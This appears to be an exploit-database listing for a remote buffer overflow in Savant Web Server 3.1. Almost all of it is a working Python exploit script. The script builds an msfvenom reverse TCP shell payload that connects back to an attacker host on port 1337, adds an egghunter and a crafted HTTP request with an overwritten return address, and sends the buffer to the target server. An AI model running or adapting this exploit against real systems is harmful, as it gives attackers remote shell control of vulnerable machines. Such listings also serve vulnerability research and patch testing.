Savant Web Server 3.1 Remote Buffer Overflow

🗓️ 03 Aug 2023 00:00:00Reported by 0xBOF90Type

packetstorm🔗 packetstormsecurity.com👁 266 Views

Savant Web Server 3.1 Remote Buffer Overflo

`# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)  
# Date: [30/07/2023]  
# Exploit Author: [0xBOF90]  
# Vendor Homepage: [link]  
# Version: [app version] (3.1)  
# Tested on: [Windows 10]  
  
import socket  
import sys  
  
try:  
server = b"192.168.56.102"  
#\x00\x0a\x0d\x25  
port = 80  
size = 253  
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337  
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25"  
buf = b""  
buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58"  
buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f"  
buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e"  
buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99"  
buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80"  
buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31"  
buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3"  
buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d"  
buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f"  
buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47"  
buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34"  
buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd"  
buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a"  
buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42"  
buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a"  
buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5"  
buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5"  
buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb"  
buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed"  
buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39"  
buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e"  
buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61"  
buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d"  
buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a"  
buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46"  
buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03"  
buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d"  
buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1"  
buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d"  
buf += b"\x6e\x61\x03"  
  
httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; test  
ecx, ecx; je 0x17  
  
egghunter =  
b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"  
egghunter +=  
b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"  
egghunter +=  
b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"  
egghunter += b"\xff\xe7"  
  
inputBuffer = b"\x90"*10+egghunter  
inputBuffer += b"\x41" * (size-len(egghunter)-10)  
inputBuffer += b"\x74\x86\x41"#0x00418674  
httpEndRequest = b"\r\n\r\n"  
shellcode = b"w00tw00t"+buf  
buf = httpMethod + inputBuffer + httpEndRequest +shellcode  
print("Sending evil buffer...")  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((server, port))  
s.send(buf)  
s.close()  
  
print("Done!")  
  
except socket.error:  
print("Could not connect!")  
`

03 Aug 2023 00:00Current

7.1High risk

Vulners AI Score7.1